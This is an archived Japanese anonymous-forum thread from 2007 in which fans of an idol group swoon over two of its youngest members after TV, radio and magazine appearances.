344 :ななしじゃにー:2007/01/27(土) 13:33:01 ID:w/MRFaVL
やっぱこの二人いいな…。

345 :ななしじゃにー:2007/01/27(土) 13:43:57 ID:rtY94bmD
レポよろ

346 :ななしじゃにー:2007/01/27(土) 13:45:54 ID:aZlAkncg
(*.゚∀゚)< 歪くーん!

味付け相談したり、仲良し末っ子sカバエかったな(*´Д`*)
このあと小僧家に行ったんだろか

347 :ななしじゃにー:2007/01/27(土) 13:46:35 ID:oUsYPYpF
子供そっちのけでピンチの時もろくに話し合わずに真剣に晩飯作っておきながら、
小僧が歪にハンバーグのたれについてアドバイス貰おうとしたとき、歪が丁寧に教えてたのが萌えたw
番組的には子供と遊べよ、と言いたいところだったが、ヨカッタ(*´Д`*)

348 :ななしじゃにー:2007/01/27(土) 13:47:58 ID:UQBBea+X
末っ子二人でいる時のテンソンがたまらなく好き
しみじみいいなぁとオモた

349 :ななしじゃにー:2007/01/27(土) 13:56:16 ID:bAtTAG0F
子供ほったらかしで二人並んで黙々と作ってる末っ子良かった
しかも二人して冷静に子供に突っ込むことは忘れないw
相変わらずいつでも真剣勝負だな


350 :ななしじゃにー:2007/01/27(土) 17:45:51 ID:rtY94bmD
萌えレポktkr
今回の放送は末っ子担的には絶対手に入れるべきだな

351 :ななしじゃにー:2007/01/27(土) 21:05:15 ID:qq4Ky8C/
歪の作ったソースを受け取る小僧に萌え(´Д`*)

>>346
>このあと小僧家に行ったんだろか
これは関係ないけどな

352 :ななしじゃにー:2007/02/01(木) 10:03:19 ID:8MOWmObK
今年はバレンタインに一緒にいれないんだな。

353 :ななしじゃにー:2007/02/01(木) 13:39:17 ID:0j0WRF8o
殘念orz

354 :ななしじゃにー:2007/02/01(木) 21:21:25 ID:M2clTZ/m
喜んで送り出してるはずだ

355 :ななしじゃにー:2007/02/02(金) 17:20:13 ID:dyNER6LL
バレンタインネタが何か分からない深山に誰かヒントプリーズorz

356 :ななしじゃにー:2007/02/04(日) 22:50:55 ID:VOeh8VPk
今気付いたけど、折スタものっそカ●゙エエ末っ子ズが
写ってるじゃねーか…

357 :ななしじゃにー:2007/02/05(月) 02:47:08 ID:MkPVsVUj
>356
もこもこでテラkwys(*´∀`)

358 :ななしじゃにー:2007/02/06(火) 10:04:28 ID:GP8cWvmP
歪と小僧がラブラブだったっていう先日のプラベ目撃談について、
誰かkwsk!!

359 :ななしじゃにー:2007/02/06(火) 11:53:09 ID:qwYehtKJ
>358
いや、それ自体知らないから。順を追って話せよ。

360 :ななしじゃにー:2007/02/06(火) 17:49:56 ID:fNvMMM1X
358 359> KWSK

361 :ななしじゃにー:2007/02/06(火) 18:13:49 ID:mSywqSBY
>360
半年ロムれ

362 :ななしじゃにー:2007/02/07(水) 02:56:19 ID:ewz2il/j
>359
小僧の名字でブログ検索すると、
日付は結構遡るが末っ子ズの目撃談が出てくるラスィ
ジヌンは忙しくてまだ探せてないが。

363 :ななしじゃにー:2007/02/07(水) 10:55:37 ID:GR6pq805
>362
もう少しキーワードないか?探すにも膨大過ぎてワケワカラン。

364 :ななしじゃにー:2007/02/07(水) 13:29:42 ID:NcrRpu3+
362> 恵比寿のアレ? 


365 :ななしじゃにー:2007/02/07(水) 14:04:02 ID:A+ELirXS
360=364 すっこんでろ

366 :ななしじゃにー:2007/02/07(水) 16:38:02 ID:ewz2il/j
>363
ジヌンも分からん、スマソ

367 :ななしじゃにー:2007/02/08(木) 06:55:52 ID:p1E/sZGo
恵比寿のアレって何?
去年の、小僧がメリケンの国から帰国した翌日の末っ子居酒屋目撃のこと?
アレはさすがに遡り過ぎだろw

368 :ななしじゃにー:2007/02/08(木) 22:47:41 ID:dC3NBfWT
>367
さすがに違うだろw

369 :ななしじゃにー:2007/02/10(土) 19:12:07 ID:SA+osDmf
この二人までイチャイチャ仲良くなると、あらちがおかしな集団になる気がするんだけど
最近そんな臭いがするw
急に仲良くなったような。

370 :ななしじゃにー:2007/02/10(土) 22:17:12 ID:8r//MrW3
確かに歯5あたりよりは今のほうが仲いいな

371 :ななしじゃにー:2007/02/10(土) 23:23:16 ID:dA8mbWnd
ところで、林檎に続いて、そろいもそろってオパーイ揉み指摘されてんだな。
同じクールでおのこ役をすれば、シチュエイションが重なるのは当たり前なのか?

372 :ななしじゃにー:2007/02/10(土) 23:57:18 ID:d9DTmnqT
いや、当たり前じゃないだろww

373 :ななしじゃにー:2007/02/11(日) 00:18:15 ID:kLQQzTf3
>370
だがしかし、その歯5からなんだよな。
2人が目に見えて変わったのって。

374 :ななしじゃにー:2007/02/11(日) 00:38:00 ID:9jpLiYiw
そうだな。
牛舌で小僧が歪に抱きついたのを見たときは、驚いてヲタも歪も一瞬固まってたw

375 :ななしじゃにー:2007/02/11(日) 03:18:16 ID:kLQQzTf3
牛舌はすごかったなw
腹が痛くてクレーンが降りれない小僧を
歪が手を貸して降ろしてたっけ。

376 :ななしじゃにー:2007/02/11(日) 03:38:33 ID:D7Xslbqz
仲が良いのはいいことだw

377 :ななしじゃにー:2007/02/11(日) 13:34:12 ID:M4+PshD1
歯5牛舌エピ知らなかった
過去ログ巡ってくる必要アリだな

ところで次のアッシュでの小僧のコメント禿楽しみなんだが
誘う紺パンフ並の名言を期待してしまっているw

378 :ななしじゃにー:2007/02/11(日) 23:24:00 ID:m+mw0WcI
>377
小僧の時、歪は色の質問を一日も温めといて
結局浮かばなかったんだよなw
他メンの時は普通に答えてたから何かモヘたw

379 :ななしじゃにー:2007/02/14(水) 17:24:35 ID:1VdQaidv
http://page16.auctions.yahoo.co.jp/jp/auction/u9196958

380 :ななしじゃにー:2007/02/14(水) 18:16:11 ID:UGbxA+NH
すまん、最近ヲタになったからわからないから教えてくれ
歯5、牛舌、って何のコンのことだ?

381 :ななしじゃにー:2007/02/14(水) 18:59:43 ID:pt1PZKAK
>380
最近ヲタになったんであれば、半年ロムって下さい。
若しくはあらち関連スレ過去ログ半年分ロムって下さい。

382 :ななしじゃにー:2007/02/14(水) 19:36:39 ID:UGbxA+NH
>381
あっ聞いちゃいけなかったのか、すまん。
他G板だとそういうのも全然大丈夫だったからさ。
友に聞いてみる、本当すまん。

383 :ななしじゃにー:2007/02/14(水) 20:03:21 ID:NdJuP8j+
芸能人の秘蔵映像が見れる掲示板!!
↓↓↓ 必見
http://talk.milkcafe.net/test/read.cgi/girlidol/1091148903/785

384 :ななしじゃにー:2007/02/15(木) 03:45:09 ID:aAJ74NDd
酔った小僧を歪が介抱した話を詳しく覚えてる人いたら教えてくれ。
いつ頃だったとかどうしても思いだせん。

385 :ななしじゃにー:2007/02/15(木) 11:17:50 ID:lPTO8IL9
>384
エデソの頃。

386 :ななしじゃにー:2007/02/15(木) 17:32:43 ID:alekMpKU
小僧の忘れ物もお持ち帰りしてました

387 :ななしじゃにー:2007/02/15(木) 23:46:18 ID:E5Ab5UzK
なにが?

388 :ななしじゃにー:2007/02/16(金) 10:36:05 ID:RnCCWD5K
ωが?

389 :ななしじゃにー:2007/02/16(金) 14:40:29 ID:3ti6Un3u
(゚Д゚)

390 :ななしじゃにー:2007/02/17(土) 23:13:42 ID:FbmgX4gX
見んなよ

391 :ななしじゃにー:2007/02/17(土) 23:18:46 ID:asr+ioqu
>384
膝マクラしてたってやつ?

392 :ななしじゃにー:2007/02/18(日) 05:24:10 ID:7YHk7cxg
>391
今更だけどもえーー
最近末っ子たちの絡むが少なくてサビシイ

393 :ななしじゃにー:2007/02/18(日) 15:32:06 ID:XIhcz68i
384だが、教えてくれた人トン!
そうかエデソの頃か。

394 :ななしじゃにー:2007/02/20(火) 23:53:10 ID:whiwMl3B
小僧からの甘〜いメールに萌え〜
内容はナイショの歪に萌え〜

395 :ななしじゃにー:2007/02/20(火) 23:57:45 ID:oxCnt12l
>394
何ネタ?
シークレットトークか?

396 :ななしじゃにー:2007/02/21(水) 00:09:00 ID:FwEapoVZ
明日発売のテレガイ

397 :ななしじゃにー:2007/02/21(水) 00:14:39 ID:Gv4vjMOr
d
wktk

398 :ななしじゃにー:2007/02/21(水) 00:51:37 ID:tl6zD6dA
d!wktkwktk
昨夜の粗宿もGJ!
二人で買い物に行った話しを思い出した。

399 :ななしじゃにー:2007/02/21(水) 01:10:05 ID:Wyit2Avk
wktkwktkwktk

400 :ななしじゃにー:2007/02/21(水) 09:29:28 ID:1Mp6aLy9
テレガイテラモエス!

401 :ななしじゃにー:2007/02/21(水) 13:08:25 ID:lPKWXHh8
ノシノシノシノシノシ

402 :ななしじゃにー:2007/02/21(水) 23:46:48 ID:LfXiZmp5
小僧の甘いメールを転送してください歪様、もしくは墓まで持ってってください。
テレガイに萌え殺されるとは思わなんだorz

403 :ななしじゃにー:2007/02/22(木) 08:14:26 ID:oY5xN+oG
テレガイに引き続き、☆誌も萌え死にそう…祭りだ!

404 :ななしじゃにー:2007/02/22(木) 11:25:44 ID:krkj2Bhi
昨夜のコークンのラジオゲストの歪、自己紹介で「小僧です」だとw

405 :ななしじゃにー:2007/02/22(木) 13:00:47 ID:A3TKucLp
この間の会報の連名の件もあるし、籍でも入れたんだろ。

406 :ななしじゃにー:2007/02/22(木) 13:30:26 ID:rCQXNiRM
ワロタ
萌え萌えだ

407 :ななしじゃにー:2007/02/22(木) 13:31:36 ID:rCQXNiRM
ゴメン
おもしろすぎてageてもーたorz

408 :ななしじゃにー:2007/02/22(木) 14:23:21 ID:IxL/CHWH
>405
ちょww
ワロスモエス

409 :ななしじゃにー:2007/02/22(木) 14:27:28 ID:ldf3m5vb
>>405
納得しますた。

410 :ななしじゃにー:2007/02/22(木) 18:05:09 ID:7QoM+NZG
おまいら明☆の記事見て卒倒しないよう気をつけろよ

411 :ななしじゃにー:2007/02/22(木) 18:24:02 ID:bGurnYlQ
余計、気になるだろw

412 :ななしじゃにー:2007/02/22(木) 18:56:52 ID:HFFUNCU/
>410
ちょ、一体何があるんだ!
本屋にひとっ走りしてくるノシ

413 :ななしじゃにー:2007/02/23(金) 00:39:11 ID:ld6BhWB8
>410、そして本屋へひとっ走りした姐さん
ほんのりでいいからぁぁぁ
気になって仕方ない

414 :ななしじゃにー:2007/02/23(金) 00:59:11 ID:XDQOl8BK
wktkすぎる!
明日、朝一で本屋行こうっと。

415 :ななしじゃにー:2007/02/23(金) 02:12:26 ID:V/V21Eii
>410じゃないが、あれで1年くらいは飯が食べれる。
末っ子ズらしい名言アリで、
あまりにカバエエくてハゲあがった。

416 :ななしじゃにー:2007/02/23(金) 07:32:42 ID:xVrTf0Ab
キタイダイデスネ

417 :ななしじゃにー:2007/02/23(金) 10:35:58 ID:FkDIzwq2
見たけど,もう大変です!!

418 :ななしじゃにー:2007/02/23(金) 14:28:43 ID:ybYcDi/E
“潤”“カズ”にフットンダ

419 :ななしじゃにー:2007/02/23(金) 15:05:10 ID:HXYJugGk
末っ子祭りktkr!

420 :ななしじゃにー:2007/02/23(金) 15:13:09 ID:xVrTf0Ab
写真がまたえらくカ●エエ

421 :ななしじゃにー:2007/02/23(金) 15:15:04 ID:xVrTf0Ab
連投スマソ

この2人ビジュアル的にも似合うし
キャラ被らないから
ダブル主演でドラマ見たいぞ

422 :ななしじゃにー:2007/02/23(金) 16:04:35 ID:FkDIzwq2
もう萌えまくりだわ〜

423 :ななしじゃにー:2007/02/23(金) 16:08:58 ID:VqmjsnXt
ktkrktkrktkrktkr

424 :ななしじゃにー:2007/02/23(金) 16:11:56 ID:ybYcDi/E
歪のクセのある歩き方が
いつからなのかも覚えてる小僧バロスw

425 :ななしじゃにー:2007/02/23(金) 16:18:03 ID:iDQQLel8
末っ子の真骨頂な対談でカンドーした
対極でありながら認め合ってる所がイイ!
折スタで歪が小僧を鼻男でのライヴァル役に指名してる所もイイw

426 :ななしじゃにー:2007/02/23(金) 17:39:24 ID:VqmjsnXt
思わず本屋で声をあげてしまった自分が通りますよ

427 :ななしじゃにー:2007/02/23(金) 17:48:23 ID:xVrTf0Ab
第2弾、第3弾をやってもらうためにも
明☆のアンケートに応募汁

428 :ななしじゃにー:2007/02/23(金) 18:46:56 ID:XDQOl8BK
買ってきたノシ
背中合わせの構図がこれまたいいんだよな。

429 :ななしじゃにー:2007/02/23(金) 19:11:12 ID:8qnDB1cl
ここもキモ婆の巣

430 :ななしじゃにー:2007/02/23(金) 19:44:25 ID:ZICFCjD3
>410だが。
おまいら同じ反応でヨカタw

431 :ななしじゃにー:2007/02/23(金) 19:59:43 ID:WXCm2Q4P
見た瞬間に一回閉じて店を出たw
顔がニヤけてヤバス

432 :ななしじゃにー:2007/02/23(金) 20:57:36 ID:Nv/dh3VL
M捨て、なんだあのバカッポーは…w

433 :ななしじゃにー:2007/02/23(金) 20:58:05 ID:y1Cg3Je4
2人でキーボードの角度手でやってるのテラカワユスw

434 :ななしじゃにー:2007/02/23(金) 21:01:59 ID:oHSyzVvm
おい、あいつら何してんだよw仲良杉ww

435 :ななしじゃにー:2007/02/23(金) 21:10:11 ID:ZICFCjD3
末っ子ズかかばえ杉で歌とトーク以外の編集がうまくできねー

436 :ななしじゃにー:2007/02/23(金) 21:12:37 ID:WXCm2Q4P
なんなんだこの末っ子ズ祭りはw

ε=(´Д`*)ハフン

437 :ななしじゃにー:2007/02/23(金) 21:26:58 ID:K3Ki1Pqo
笑うの堪えきれない小僧を笑うなよって笑いながら突っ込む歪w
なんだよ末っ子ズwカワユすぎるぞw

438 :ななしじゃにー:2007/02/23(金) 21:39:17 ID:ybYcDi/E
>435
ジヌンもどう編集したらいいかアタフタだ
後半浜●ジャマだったな

64 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)